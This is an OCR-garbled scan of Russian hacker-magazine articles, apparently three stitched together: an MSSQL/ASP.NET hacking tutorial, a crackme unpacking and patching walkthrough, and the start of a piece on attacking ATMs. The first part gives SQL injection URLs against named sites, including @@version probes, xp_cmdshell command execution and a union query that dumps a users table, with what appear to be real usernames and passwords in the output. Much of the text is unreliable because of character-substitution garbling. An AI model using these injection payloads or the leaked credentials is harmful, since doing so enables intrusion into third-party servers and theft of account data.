— со1итп_пате и табличкой — со Іи тпз, а 
база все та же — іпЬгта1;іоп_5сЬета. Кстати, 
в МуЗСИ база іп^огтаііоп_зсЬета появилась 
лишь в пятой версии; с целью совместимости 
названия таблиц и полей остались такими же, 
как и в М55СИ. іпі : огтаііоп_5сЬета — весьма 
удобная вещь, которая не раз выручала меня 
при взломе :). Еще одна полезная прибамба- 
сина в М550Б — определение версии ОС на 
сервере и версии МВЭСИ-сервера. Составим 
следующий запрос к базе: 

ѵтѵі. опІіпесазіпогерогДз . сот/ 
пеѵ\/з_зЬоѵ\/_саЦ . азр?саД=1%27+ипіо 
п+аІІ+зеІесД+1, ©©ѵегзіоп, 3-- 
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> Названия таблиц, выдранные из базы іггіогта*іоп_5сЬета >Преобразованиетипов полей 



Ответ вполне ожидаем: 

Місгозоік ЗОЬ Зегѵег 2005 
-9.00.1399.06 (Іпкеі Х86) Оск 
14 2005 00:33:37 Соругідкк (с) 
1988-2005 Місгозоік Согрогакіоп 
Ехргезз Есіікіоп оп ЭДіпсЗош ИТ 5.2 
(Виіісі 3790: Зегѵісе Раск 1) 

Полагаю, комментариитутизлишни. Еслиты ви- 
дишь, что стоит бажная ось или на машине кру- 
тится непропатченная версия М550І_-сервера, 
— флагтебе в руки =). Крометого, при удачной 
раскладе, ты можешь получить шелл в системе. 

В МЗЗСПесть возможность выполнения команд 
через зці-запрос. Осуществляется это действие 
при помощи нехитрой конструкции вида: 

ехес тазкег. .хр_сшсЗз]те11 "коман- 
да"— 

В кавычки вставляется команда, которую ты 
желаешь выполнить. В готовой квери запрос 
примет ВИД: 

ѵ\ллм.Ъад_зіке . сот/іпсіех. азр?Ы 
ате=1%27 ; ехес%20тазкег . .хр_ 
стс!з]те11%20%22пекзкак%22-- 

В случае успеха, мы получим результат выполне- 
ния команды пеізіак Однако обрати внимание 
на символ «;» перед основной конструкцией 
запроса. Дело втом, что в М55СИ можно разде- 
лятьзапросы при помощи «;». В нашей ситуации 
мы закрываем предыдущую кверю и создаем 
свою, новую. Правда, хочутебя огорчить — часто 
бываеттак, что прав на выполнение команд не 
хватает и сервер возвращаетошибку: 

[Місгозокк] [ОБВС 3<2Ь Зегѵег 
Вгіѵег] [3<2Ь Зегѵег] ЕХЕСБТЕ 
регшіззіоп сіепіесі оп окдеск 'хр_ 
спкЗзкеІІ ' , (ЗаСаЬазе ’тазкег', 
оѵтег 1 сіЪо ' . 

В такой ситуации нужно искать другие пути 
решения проблемы. Поверь, они есть=). Оп- 
ределенныетрудности на первых порах могут 



возникнуть из-за отсутствия автоматического 
преобразования типов полей. Ответе ошибкой 
обычно выглядиттак: 

Місгозокк 3<2Ь Ыакіѵе Сііепк еггог 
' 80040е07 ' 

Орегапсі Суре сіазк: пкехк із 
іпсошраСіЫе ткЬ. іпк 

В Му5СН_ такой проблемы нет, а вот в М550І_ все 
придется делать вручную. Реализовать преоб- 
разованиетипа поля можно при помощи сазШ. 
Синтаксис предельно понятен и затруднений 
вызватьутебя не должен. Поэтому обратимся к 
примеру, вернемся к нашему казино: 

шт. опііпесазіпогерогкз . сот/пеѵ\/з_ 
з!ютл7_саС . азр?сак=1%27+ипіоп+зе1еск 
+1 , сазк ( ісі+аз+пѵагскаг) %2Ьс1таг ( 58 ) 
%2Ьпаше+%2Ьс]таг (58) %2Ъраззѵ\гогсі%2Ъс 
каг (58) %2Ъсазк (із_ас]тіп+аз+пѵагска 
г) , 3+1гот+СРС_иЗЕКЗ+-- 

Какты видишь, запрос успешно выполнился, и 
мы получили то, что хотел и (кусок): 

1/4/1900 1 : Аіех: атікразз : 1 

1/4/1900 100 : ѵедаз_Сомегз : 

и54 ОіЬоп : 0 

1/4/1900 101 : ЗипРаІасе : 

5Сорк228а : 0 

1/4/1900 102 : Ьаскир : ЬЬа01дп2 : 0 

1/4/1900 103 : СазіпоТгорег : 

Іи518ѵ8^ап: 0 

1/4/1900 104 : с1иЪ_Ѵ\ЮГІс1 : 

со119кпа8 : 0 

1/4/1900 105 : ѵірргокікз : 

2а1кзкдаз : 0 

1/4/1900 106 : СоЮепЕіѵега : 

ка910пЬ: 0 

Одним из существенных недостатков синтаксиса 
М55СИ является отсутствие ЫМІТ'а. В мускуле 
с помощью него оченьудобно листатьзначения 
полей при реализации очередной инъекции. 

Но мелкомягкие в своем продукте лишили нас 
такой возможности. И все же выход есть. Листать 



записи в таблице можно ТО Р'ом. Процедура 
геморройная, но вполне осуществимая: 

еѵепкѵіЪе . сот/сЗіѵаз/ВекаиІк . 
азр?т=6_1_2004%27+ипіоп+зе1еск+кор 
+1+1 ,2,3,4,1(1,6,7,8,9,10,14,12, еша 
іі , 14 , 15+кгот+изегз-- 

В этом запросе, при реализации инъекции, нам 
остается лишь подменять значение, идущее за 
ТОР'ом. Например, так: 

еѵепкѵіЪе . сот/с1іѵаз/Векаи1к . 
азр?т=6_1_2004%27+ипіоп+зе1еск+кор 
+2+1 ,2,3,4, ісі, 6,7,8,9,10,14,12, ета 
іі , 14 , 15+кгот+изегз++-- 

Можно составить более продуманную кверю: 

еѵепкѵіЪе . сот/сІіѵаз/ВекаиІк . азр? 
т=6_1_2004%27+ипіоп+зе1еск+кор+1+ 
1,2, 3,4, ісі, 6, 7, 8, 9, 10, 11, 12, етаіі 
, 14 , 15+кгот+изегз+ѵгкеге+етаіІ+по 
к+іп+ ( зе1еск+кор+8+етаі1+кгот+из 
егз) +-- 

Как видишь, здесьуже дополнительноеусловие 
содержит в себе ТОР. 

О Премудрости А5Р.ЫЕТ 

С М55СИ частично разобрались, плавно 
переходим казрх-скриптам и самой платформе 
А5Р.ЫЕТ. Как я уже говорил, А5Р.ЫЕТ не просто 
новая версия А5Р. Она была написана мелко- 
мягкими фактически с нуля, поэтому и включает 
в себя базовые концепции безопасности. В 
общем виде ихтри: 

• аутентификация; 

• авторизация; 

• заимствование прав. 

Первый пункт объяснять, надеюсь, не нужно :). 
Но основныетипы аутентификации, реализуе- 
мые в связке 1 15+АЗР N ЕТ, все же рассмотрим. 

1. Апопуглоиз Ассезз — анонимный доступ. 
Здесь все просто. Любой юзер может получить 
доступ к веб-контенту. 

2. Вазіс АиіИепбсаііоп — базовая аутентифика- 
ция. В этом случае юзеру предоставляется 
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>іІІоГлпа1іоп_ 



зсЬета — весьма 
удобная стандарт- 
ная база в М55СИ, 
которая не раз 
выручала меня при 
взломе. Никогда не 
забывай о ней. 

Парольучетной 
записи в конфи- 
ге ѵѵеЬ.сопІід по 
дефолту находится 
в открытом виде, 

ПОМНИ ЭТО :). 



у \ 




> Внимание! 
Информация дана 
исключительно в 
ознакомительных 
целях! Ни автор, 
ни редакция за 
Твои действия' 
•ответственности не 
несут! 
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>Узнаем версию ОС и М550І_-сервера 



диалоговое окно регистрации, вводимые данные кодиру- 
ются алгоритмом Ваве64 и отправляются прямо к 115. Затем 
вбитая учетка сравнивается с выставленными правами для 
данного ресурса, и пользователь получает ответ. Что такое 
Вазе64 и с чем его едят, полагаю, говорить не надо. Для рас- 
шифровки подобного хэша в РНР достаточно использовать 
функцию Ьазе64_бесобе(). 

3. Оідезі Аиібепіісаііоп — этоттип аутентификации также 
предполагает отправку шифрованного хэша учетки серверу 
для проверки на достоверность. Однако работает только под 
Осликом и сѵѵеЬ-сервисами .МЕТ. 

Крометого, имеется в наличии еще и интегрированная 
аутентификация ѴѴіпбоѵѵз, с которой ты, скорее всего, 
встречался не раз. Так вотесли анонимный доступ отключен 
и все остальныетипы аутентификации находятся в ауте, то 
115 автоматом запускает именно виндовую интегрированную 
аутентификацию. 

Следующий любопытный момент — это заимствование 
прав. Суть технологии заключается в заимствовании прав 
юзера при обработке его запроса. Для анонимных запро- 
сов А5Р.ЫЕТ использует свою специальную учетку с име- 
нем А5РЫЕТ. Настроить учетку можно в конфиге тасЫпе. 
сопіід, причем по дефолту элемент <ргосе55МобеІ> содер- 
життакую запись: 

изегЫаше = "тасМпе" 
раззтлгогсі = "АиДоСепегаДе" 

Еще один наглядный пример — конфигѵѵеЬ. сопіід. Он лежит 
в корне ресурса и имеет следующий вид: 

ссопДідигаДіопхзузДет. ѵ/еЪ> 

<аиДІгепДісаДіоп тосіе = "Міпскжз I Разз 
рог Д | Рогтз I Ыопе " > 

# параметры аутентификации 
< / аиДЬепД ісаД іоп> 

<аиДДюгІ2аДіоп> 

# юзеры, имеющие доступ к приложению 
</аиДДюгІ2аДіоп> 

<ісіепДіДу> 

# указание на заимствование прав 
</іс!епДіДу> 

</зузДет. ѵ\/еЪх/сопДідигаДіоп> 

Нас интересуетзаимствование прав: 

ссопДідигаДіопхзузДет. ѵ\/еЪ> 

<іс!епДіДу ітрегзопаДе = " Дгие" 
изегМате = "МуІІзегМате" 



раззѵгогсі = "Му Ра залоге!" /> 

</зузДет. ѵ\/еЪх/сопДідигаДіоп> 

Обрати внимание на то, что пасс лежит в конфиге в открытом 
виде! Еще один занимательный раздел конфига ѵѵеЬ.сопІід 
— <си5іот.Еггог5>. Он определяет поведение А5Р.МЕТ при 
возникновении ошибок: 

ссопДідигаДіопхзузДет. тл/еЪ> 

<сизДошЕггогз тосіе = "ОДД" /> 
</зузДет.хѵеЬх/сопДідигаДіоп> 

Существуеттри значения для атрибута тобе. 

1. РетоІеОпІу — страница ошибки и сорецскрипта будут 
показаны только при вызове скрипта с локалхоста. Для 
остальных юзверей происходит редирект на ошибку 115. 

2. Оп — в этом случае отображаются специальные страницы 
ошибок. Очень часто админы вешают фейковые ерроры. 

3. 011 — самый вкусный момент =). Если тобе установлен 

в 011, то при вызове ошибки ты увидишь полный сорецскрип- 
та. Комментарии излишни. 

По дефолту глобе присвоенозначение РетоІеОпІу, хотя 
мне не раз встречались ресурсы, демонстрирующиетретий 
вариант :). 

□ Послесловие 

Как ни старайся, ноуместить весьжелаемый материал в 
одной статье не удается. Надеюсь, ты понял, что взлом азрх- 
движков — вполне решаемая задача. Мне не раз встреча- 
лись с виду неприступные серверы, админы которых халатно 
относились к конфигурации А5Р.ЫЕТ и функционированию 
скриптов. Конечно, существуют и довольно сложные момен- 
ты, но чем сложнее система — тем она интереснее =). И 

> Конфигурация сервера 
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АНДРЕИ ЧЕРНОВ 



КАК ЛОМАЮТ 
ИНСТАЛЛЕРЫ 





ВЗЛОМ КРИПТОГРАФИЧЕСКИХ ИНСТАЛЛЯТОРОВ 



Как обычно, субботним вечером за ящиком пива я решил побродить по просторам 
Сгасктез.бе в поисках какого-нибудь новенького сгаскте. Честно сказать, я уже немно- 
го устал от этого обилия «плоских» защит. Большинство из них я уже переломал вдоль и 
поперек. Хотелось чего-то новенького, пусть даже не суперсложного, но интересного :) . 
Ия нашел, что искал! Сегодня мы вместе сломаем софтину, упакованную в криптогра- 
фическом инсталлере. 



О Лиха беда начало 

Итак, в архиве с крякмисом лежитеще один 
запароленный архив, ключ к которому и есть 
наша цель. Сам ЕН в описалове говорит что-то 
про путешествия, склепы, тайники и секретное 
слово. Какты понимаешь, путешествия и склепы 
заинтересовали меня меньше всего. Сейчас 
я покажутебе экстремальное выковыривание 
секретного слова... Заранее предупреждаю, 
сгаскте сжат самописным упаковщиком, 
использует неплохую криптографию и 
содержит полиморфный код. Полиморфизм 
в данном случае выражается в том, что 
программа сама изменяетсвой собствен- 
ный код прямо во время выполнения. 
Слабонервных, детей и беременных женщин 



просим листать дальше. Все остальные бегут в 
магазин за пивом и открывают РЕЮ. 

□ Осматриваемся 

Итак, открываем крякчерез РЕЮ и видим, 
что он ничего не нашел. Ни пакера, ни 
протектора, ни языка программирования. 
Плохо, но не смертельно. Идем в 0 Ну и 
открываем нашего подопытного кролика. 

По «Е9» запускаем на выполнение и тут 
же тормозим на ошибке доступа по адресу 
00000000. Хорошо, в лоб не получается. 

Как говорится, умный в гору не пойдет, 
умный гору обойдет (или най#$т :) — приме- 
чание редактора). Запускаем крякми уже без 
О Ну, а в 0 Ну жмем «Еііе □ АиасЬ». Находим 



в списке наш процесс и цепляемся к нему. 
Сразуже вываливаемся в модуль НісІП... Те- 
перь нам нужно открыть содержимое памяти 
«Ѵіеѵѵ □ Метогу». Там и лежит наш экзеш- 
ник, к которому нужно прицепиться. После 
того как окажемся в нем, нажмем «Сігі-А» 
для того, чтобы убедиться, что это то, что нам 
нужно. 

□ Распаковка 

Немного опишу довольно стандартную для всех 
пакеров процедуру распаковки. Для того чтобы 
код, который ты сейчас видишь, поместить в 
экзешник, можно пойти двумя способами: 

1. способ извращенцев и джедаев — вручную 
скопировать шестнадцатеричный дамп в память 
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>Снимаем дамп сзапакованного файла 



> Полиморф отработал. Все красным-красно 



и также вручную в РЕ-заголовкеуказатьточку 
входа :); 

2. способ ленивых и мой :) — снять дамп с 
помощью плагина ОИуОшпр и там же указать 
точку входа. 

Извращенцы и джедаи опять бегутза пивом, а 
остальные чита ют дальше. 

После того как окажемся в модуле сгаскте. 
ехе, нажимаем «Ріидіпз ОІІуОитр -> йитр 
ОеЬиддесІ Ргосезз». 

В качестве ОЕР рекомендую поставить 1 00С. 
Почему? Я не смогу до конца ответить на этот 
вопрос — это приходите опытом... Но из кода 
видно, что программа написана на чистой асме 
(хотя Еіі это тоже не скрывал), и первое, что нуж- 
но программе, — это получить свой хэндл, что и 
делаетбеіМобиІеНапсІІе, а ЭеШпбапсІІесІЕхсер 
бопЕНіег работает для других нужд программы. 
Для каких — читай дальше. 

Смеложмем «Оиппр» и сохраняем в новый файл. 
Из нового файла программа должна запуститься 
без проблем. 

Все, на этом процесс распаковки закончен. 

И не надо спрашивать меня, почему мы не 
восстанавливали импорти неудаляли лишние 
секции. Это тебе не АЭРаск или II РХ. Этотпакер 
написан самим автором Сгаскте, то есть ЕІГом. 
Если тебе интересен код пакера, скажу заранее, 
исходники его и Сгасктележатвзапароленном 
архиве :). Так что стимул есть в любом случае! 

□ Исследование 

Немного поясню, чего от настребует программа. 
В окне есть небольшой квадрат серого цвета, на 
котором мы должны поводить грызуном и в ре- 
зультате получить либо сообщение, либо строку 
с поздравлением (такя думал сначала). Но лич- 
но я не нашел в программе ни одной функции, 
которая бы работала с файлом и ставила на него 
пароль, хотя ЕІТ конкретно говорит про секрет- 
ное слово, а значитоно есть. В Зігіпд Реіегепсез 
было чисто. Я искал его недолго. Скажу больше: 



я его вообще не искал. Это было бы слишком 
просто, да и вообще — я давно отвык оттаких 
простых путей. Иногда, кстати, это очень даже 
зря. Но не будем отступать оттемы. 

Код программы довольно простой, и становится 
не совсем понятно, в каком месте может гене- 
рироваться какой-то набор символов. Ладно, 
посмотрим на программу в действии. Жмем 
«Е9» и пробуем поводить грызуном по серому 
квадратику. 

Опа! Произошлото, чего я ожидал меньше 
всего. Программа вывалилась по адресу 
00401 1АА, где находится привилегированная 
инструкция I N ѴО . Если говорить откровенно, я 
никогда раньше не встречался с этой инструк- 
цией. Вот это я нашел в поисковике (цитата): 

«Очистка внутренней кэш-памяти при 
сквозной записи (обнуление бит до- 
стоверности всех строк) осуществля- 
ется внешним сигналом РЫЛЗН# за один 
такт системной шины (и, конечно же, 
по сигналу КЕ8ЕТ) . Кроме того, име- 
ются инструкции аннулирования ШѴБ и 
УГОШѴБ. Инструкция ІМѴБ аннулирует 
строки внутреннего кэша без выгруз- 
ки модифицированных строк, поэтому 
ее неосторожное использование при 
включенной политике обратной записи 
может привести к нарушению целост- 
ности данных в иерархической памяти. 
Инструкция ШЗШѴБ предварительно 
выгружает модифицированные строки в 
основную память (при сквозной записи 
ее действие совпадает с ШѴБ)». 

Лучше, чем написано, я уже не скажу. Та функ- 
ция, что стояла на ОЕР, как раз и нужна была для 
того, чтобы фильтровать инструкции, вызываю- 
щие исключения, и передаватьуправление по 
адресу, который содержитуказатель, передан- 
ный этой функции. На самом деле, все выглядит 



гораздо проще, нотак как мы находимся в 
отладчике, посмотреть это представление 
нереально. 

В любом случае выполнить инструкциюу меня 
так и не получилось, даже послетанцев с бубном 
(бубен, наверное, был ОетоѴегзіоп). Самое 
лучшее, что я смог придумать, — это занопить 
строку. Конечно, теперь никто не гарантирует 
правильной работы программы, но, по крайней 
мере, уже можно двигаться дальше. 

□ Вскрытие показало, 

что больной умер от вскрытия 

Итак, чем больше я водил мышью по форме, тем 
больше у меня возникало сомнений по поводу 
работоспособности программы. Уж очень 
простой код, в нем нет ни одной подозрительной 
функции. 

Я решил пойти старым проверенным способом, 
который уже не раз выручал меня в подобных 
ситуевинах. Если программа проходитадрес 
00401 1 АА, где раньше стояла ІКІѴО, то дальше 
можно пройти вручную по «Е8». Хотя этот номер 
тоже прошел не с первого раза, в один прекрас- 
ный момент я попал на 00401319. Если честно, то 
я этого и хотел. Уж больно интересная концовка 
короткого кода там находилась. 

По этому адресу располагался са II, который 
оканчивался на 0040134С командой ПЕТЫ 
(возврат). Ниже лежал не менее интерес- 
ный код, представляющий собой цикл, а 
еще ниже валялся код, очень непохожий 
на обычные опкоды ассемблера. Скорее 
всего, этот участок был забит вручную, либо 
содержал какие-то промежуточные данные, 
использующиеся для нужд шифрования. 

Чуть выше второй точки возврата можно 
заметить зацикливающую команду ЮОРО на 
адрес 0040135С. Сама команда находится по 
адресу 00401369. Если прочитать код повни- 
мательнее, то очень легко просматривается 
следующая цепочка: 
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> ѵ\лллл/.сгаскіІіетаЦ. 
сот — мой портал, 
на котором ты най- 
дешь весь нужный 
софт и крякми. 
ѵѵѵѵѵѵ.топоІііН.кг 

— парни делают 
отличную музыку. 
Статья писалась под 
их шедевры. 
ѵѵѵѵѵѵ.сгасктег.сіе 

— здесьты найдешь 
крякми, описыва- 
емый в статье, и 
много других. 




> Статья ориенти- 
рована на изучение 
защиты программ от 
взлома и никак не 
должна отразиться 
на твоих крякерс- 
ких деяниях. За все 
противозаконные 
действия отвечаешь 
только ты сам. Ни 
автор, ни редакция 
за них ответствен- 
ности не несут. Если 
программатебе нра- 
вится, то лучше купи 
ее. А не нравится 
— не пользуйся. 




> На ОѴй ты сможешь 
найти оригинальный 
Сгаскте и взломан- 
ный поэтапно. 



> Результат ста ран ий — поздравления 
и картинка в архиве 



00401340 

00401341 

00401343 



РОР ЕЗІ 
МОѴ ЕАХ , ЕВХ 
ІМЦЪ ЕВХ 



/Сравниваем еах с числом 58291327 
00401345 СМР ЕАХ, 58291327 

/Если равно, прыгаем на 004 0134Б, то есть не 
возвращаемся из процедуры 

0 04 0 13 4А БЕ ЗНОКТ е11_сш. 0040134В 

0040134С КЕТЫ 

/ Если не равно , возвращаемся, откуда пришли 

0040134Б МОѴЕБІ, е11_ст. 004013 бВ 

00401352 МОѴ ЕАХ , ЕБХ / Приходим сюда , 

если ЕАХ равен 58291327 



00401354 


МОѴ ЕСХ, 115 




00401359 


ЗНК ЕСХ, 2 




0040135С 


МОѴ ЕВХ , БѴТОКБ РТК БЗ : 


[ЕБІ] 


0040135Е 


ХОК ЕВХ , ЕАХ 




00401360 


МОѴ БШКВ РТК БЗ: [ЕБІ 


] , ЕВХ 


00401362 


АББ ЕАХ , ЕБІ 




00401364 


ЗБВ ЕАХ, ЕВХ 




00401366 


АББ ЕБІ , 4 




00401369 


БООРБ ЗНОКТ е11_ 




ст. 0040135С 







/ Циклимся, пока ЕСХ не обнулится 
/ ЕСХ содержит количество проходов 
0040136В КОК ВѴТОКВ РТК БЗ : [ЕСХ+ЗВ] ,78 

0040136Е ЕЬБІ 

00401371 РБЗН 48ВЕСЕЕС 

00401376 РОР ЕЗ 

00401377 КЕТЫ 

Ты спросишь, почему я выбрал именно этот кусок кода 
из общей кучи? Все очень просто — это единственное 
место, где стоит команда сравнения регистра с числом 
(СМР ЕАХ, 58291 327). 

Далее, схема очень проста. Меняем конструкцию: 



00401345 

0040134А 



наследующую: 



00401345 

0040134А 



СМР ЕАХ, 58291327 

БЕ ЗНОКТ е11_ст. 0040134Б 



МОѴ ЕАХ, 58291327 

БМР ЗНОКТ е!1_ст. 0040134Б 



> Столько стараний из-за одной подсказки 



Зачем я поставил МОѴ ЕАХ, 58291327, если ниже идет 
безусловный переход? Дело в том, что контрольное число 
может быть как контрольной суммой, так и строкой, с 
которой дальше могут проводиться любые операции. 

Нет никакой гарантии, что, поменяв переход, мы полу- 
чим в ЕАХ то значение, в результате работы с которым не 
произойдет ошибки. В рамках этой процедуры регистр ЕАХ 
более не затрагивается, но кто знает, куда может привести 
нас выход из процедуры. Лично мне не очень хотелось 
прослеживать цепочку. Гораздо правильнее вставить 
контрольное число явным образом. 

Дальше, чтобы не пропустить самое интересное, я 
поставил точку останова на наш безусловный переход 
и активировал окно программы. Бряк не заставил себя 
ждать. 

О Интересное кино... 

После остановки, понятное дело, зажимаем «Б8», чтобы 
пройти цикл, и... о чудо! Все, что идет после 00401 36 Е, прямо 
на глазах преображается в абсолютно нормальный ассемб- 
лерный код!!! Это и называется полиморфизм. 

Важно не засмотреться на это чудо и успеть остановиться, 
когда есх станет равным единице. Кактолько это произой- 
дет, необходимо притормозить на секунду, чтобы изучить 
код. ОНу сама анализирует программутолько при открытии. 
Проанализировать ее еще раз можно нажатием «Сігі-А». Так 
и сделай. 

Теперь всмотрись в код как можно внимательнее, отключи 
воображение и включи соображаловку. Заметь, что первая 
АРІ -функция начинается по адресу 00401 ЗВ В, но после ее 
выполнения не стоит никакого перехода или саіі'а на функ- 
ции, которые лежат ниже. Вместо этого там находятся неоп- 
ределенные опкоды, на которых мы обязательно брякнемся, 
если продолжим выполнение. 

Закрой глаза и нажми «Е9». Потом открой, выпей с горя 
пива и перезапускай программу. Как и ожидалось, после 
нашиххитрых манипуляций, программа повела себя не 
так, как должна была. Первая же команда, следующая 
за циклом, вызвала исключение. Почему, где и когда 
была ошибка, разбираться уже поздно. Мы зашли уже 
слишком далеко и не собираемся останавливаться. 
Вместо этого мы постараемся ручками поправить код 
таким образом, чтобы программа прошла по функциям, 
не вызвав ошибку. 
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ОФиксим код 

Как я говорил раньше, первая функция находится по адресу 
004013ВВ. Значит, после цикла мы должны попасть сразу на нее. 
Есть только один способ сделать это — 4МР 00401 ЗВ В. Выходить 
из В ИВ II тоже не спеши. Посмотри, где лежит следующая порция 
функций, а заодно обрати внимание на одну из них — йгаѵѵТехіА. 
Какты думаешь, что она делает? Элементарно, Ватсон! ОгаѵѵТехіА 
рисует на форме текст, указанный в параметре іехі. Если ты ви- 
дишь то же самое, что и я, то тебе, наверняка, захотелось посмот- 
реть на это творение в дампе. Щелкай на строке с текстом правой 
кнопкой, «Еоііоѵѵ іп Оитр Іттесііаіе сопзіапі» (показать в дампе 
строковую константу). Самое вразумительное, что тыувидишьв 
дампе, начинается с адреса 00401384 («Уои вех іехі: са гѵесі ... ») . Вот 
так мы и нашли тоттекст, который нам нужен. Дело за малым. В 
параметре іехі поменяй адрес на тот, который нам нужен. Вот, что у 
тебя должно получиться: 



0040142Б 

0040142Р 

00401431 

00401436 

00401438 

0040143Б 

00401443 



; пушатся в стек аргументы 
РБЗН 0 
РБЗН 11 

РИЗЫ е11_сш. 0040300С 

РБЗН -1 

РБЗН е11_сш. 00401384 

РІІЗН БЖЖБ РТК БЗ: [403150] 

; запускается функция 

САШ < БМР . &изег32 . БгаѵАГехЦЕхА> 



; ІРІадз = БТ_СЕЫТЕЕ I БТ_ТОР I БТ_ШКБВКЕАК 
; ІрКесР = 00403 00С { 5 . , 35 . , 3 05 . , 145 . } 

; ІСоипР = РЕРРРРРР (-1.) 



I I ТехР = "Уои зее РехР сагѵесі іп ѵтаіі: " 

; ІНБС = 0А0109А2 
; \БгаѵАГехЦЕхА 

Атеперь фокус-покус. Нажми еще раз «Сігі-А» и возрадуйся, ибо весь 
код стал читабелен. И в связи с этим я предлагаю пересмотреть нашу 
траекторию полета. Посмотри на параметры функции ВІІВІІ и обрати вни- 
мание, что один из них мы незахватили. Надо было читать М50ІМ. Теперь 
мы должны сделать переход от цикла кадресу 004013В6. Перезапускаем 
программу, вносим все изменения, жмем «Сігі-А» и любуемся результа- 
том. Да, мы сделали это! 

Теперь окно С га скте значительно преобразилось. Но не спеши 
радоваться — это только начало конца. Нам дали подсказку, ноне 
пароль от архива. Е Іі неплохо придумал, расположив буквы на доске 
в том порядке, что ты видишь в подсказке. Он разделил квадрат на 
девять маленьких квадратов, в которых размещены буквы. И теперь 
наша задача сводится ктому, чтобы найти нужное ключевое слово 
из набора имеющихся. Я помню, как в детстве любил такие голово- 
ломки... 

□ Занавес открывается 

Теперь у нас есть два варианта. Можно взять имеющийся набор симво- 
лов, вписать в брутфорс и пойти пить пиво дальше, а можно посидеть и 
поводить мышью в оригинальном Сгаскте, подбирая нужную комбина- 
цию. Повторяю для тех, кто в бронепоезде: экспериментировать нужно 
в оригинальном крякми. Причина втом, что мы многое поменяли после 
распаковки не факт, что оно будет работать правильно. 

Я пошел вторым путем. После пары часов банального смыслового 
подбора, я нашел то, что искал. Пароль на архив — «АЫТІѴІѴІТІІ5?». Без 
кавычек, естественно. ПС 



Настоящий ТВ-тюнинг! 

ччгіьгш.Ьг’ЬізМпгги " 

УНИКАЛЬНЫЕ ЖЕЛЕЗО И СОФТ: 

+ Безупречные картинка и звук 
+ Запись без рекламы 
+ Объемное изображение 
+ Виде о наблюдение 

ШИРОКИЙ ВЫБОР УДОВЛЕТВОРИТ ВСЕХ 

ВеНоМег 1 







В последнее время меня захлестнули письма читателей с вопросами типа: «Как можно 
взломать банкомат и возможно ли это вообще?» Чтобы развеять все твои сомнения, я 
решил написать эту статью. Вся информация предоставляется с целью ознакомления, 
так что будь внимателен : ) . 



О Как это работает 

Для начала уточню, что речь в своей статье я 
буду вести исключительно о банкоматах и на 
этот раз мы не будем писать скамы, рассмат- 
ривать кредитки и т.д. Грубо говоря, наша 
цель — изучение систем защиты банкоматов и 
выявление в нихуязвимых мест. Какобычно, 
работаем любыми доступными и недоступными 
методами =). 

Начнем, пожалуй, с общего представления о 
функционировании банкоматов, их обслужива- 
нии и связи с банками. Сам банкомат (или АТМ 
^^иіотаі есІ Те Цег МасЫпе) представляет собой 
Цютер'совмешстЯШй с сейфом. Компьютер, 
правилѣ, о^МИКустройством ввода, дис- 
плеем, кардридером (для чтения данных с плас- 
тиковой карты), презентером (для выдачи кэша) 



^^^лиіопг 

^ксЯВьюі 

каюІіраЕ 
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и чековым/журнальным принтером. Едва ли не 
самым дорогим устройством в банкомате явля- 
ется диспенсер —девайс, предназначенный для 
взятия/подачи денежных купюр, их проверки на 
подлинность и сортировки. Банкоматподключа- 
ется к процессингу (например, по протоколу X. 25) 
для возможности обмена данными с банком. 
Криптографические алгоритмы, использующие- 
ся для шифрования передаваемой информации, 
и ПО, установленное в банкоматах, мы пока тро- 
гать не будем (нотолько пока). Кстати, банкомат 
можетсвязываться с АТМ -контроллером и пос- 
редством ѴѴі-РІ адаптера, такая необходимость 
в»&ыийеет в случае отсутствия фаищонарных 
каналов св^зи. Но об этом'далйё. Сейчастебе 
нуж^) четко представить схему работы ^анфма- 
таиего связи с банком. ДмАщ ^ 

• ш 



Следующий важный момент — обслуживание 
и заправка банкоматов. По способу обслужи- 
вания банкоматы делятся на два типа: сзадней 
загрузкой, при которой, соответственно, все 
обслуживание банкомата производится сзади, 
и с передней загрузкой, при которой банкомат 
обслуживается спереди. Тебе, наверняка, дово- 
дилось видеть, как пара здоровенных мужиков в 
камуфляже и с карабинами в рукахзаправляли 
кассеты банкомата. Это зрелище несомненно 
завораживает красноречивым сочетанием де- 
нег и оружия :). Грабить и убивать мы никого не 
собираемся, но одну интересную д еталь я отм е- 
чу^емя выезда инкассаторо^й^щд^^ится 
в секрете, а сами инкассаторы получайл, пакеты 
с маршрутами непосредственно перед выездом. 
Не вижу'Сзі^^дарассма^риваті^-'-^' 
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установочные системы банкоматов, однако скажу, что доста- 
точно популярным является способ установки через стену с 
внутренними креплениями. Вырвать такой банкомат можно 
только с куском стены :). 

□ Атака извне 

Вот мы и подошли к более интересной части. Сейчас мы 
ознакомимся с внешней защитой банкоматов. Под внешней 
защитой я подразумеваю: 

• камеры видеонаблюдения; 

• 6Р5-МЭЯЧКИ; 

• сигнализацию; 

• корпус (и сейф банкомата). 

Здесь нужно знать одну деталь: банкоматы в России 
представлены в большинстве своем всего тремя фирмами- 
производителями: ОіеЬоІсІ, Зіетепв и КІСВ. Встречаются 
также и ВепО, но их несколько меньше. Эти виды банкоматов 
отличаются, прежде всего, стехническойточки зрения, имея 
свои нюансы в устанавливаемом ПО. Походу статьи я буду 
указывать на такие различия. 

Список распространенных операционок для банкоматов 
выглядит следующим образом: 

1. ІВМ 05/2; 

2 . МЗѴѴіпКІТ; 

3. МБ ѴѴі п2000/ХР; 

4 . Ыпих. 



включает в себя дополнительный системный блок, камеру, 
интерфейсный кабель и сетевую карту. Отличительной осо- 
бенностью системы является ее автономность. При выходе 
из строя банкомата, система видеонаблюдения продолжает 
функционировать в автономном режиме. Это позволяет 
производить съемку даже при попытке злоумышленников 
нанести повреждения банкомату. ѴѴеЬАТМ работает под уп- 
равлением ІВМ 05/2 и М5 ѴѴі п2000/ХР на банкоматах ОіеЬоІсІ, 
под М5 ѴѴіп2000/ХР на банкоматах Біетепз и под ІВМ 05/2 на 
банкоматах ЫСР. Версия для ОіеЬоІсІ под Ыпих находится в 
разработке. 

Кстати, любопытные параметры имеет конфигурационный 
файл ѴѴеЬАТМ. Для примера я приведу небольшой кусочек 
с комментариями, а полное описание ты сможешь найти на 
нашем диске. 

агсЬіѵе_ра*Ь — задает путь к архиву снимков. По этому пути 
будут сохраняться снимки, полученные в процессе работы 
системы. 

Іод_ра*Ь — полный путь и имя файла журнала, 
адеп* — задает имя банкомата. Служит для идентификации 
банкомата. Имя может быть любым, количество символов в 
котором не превышает 10-ти. Систему нумерации каждый 
банк может выбирать сам. Имя указывается на каждом 
снимке в поле Ю для однозначной идентификации банко- 
мата, на котором сделан снимок. 

зЬоМпазк — маска для номера карточки. Если указана мае- 


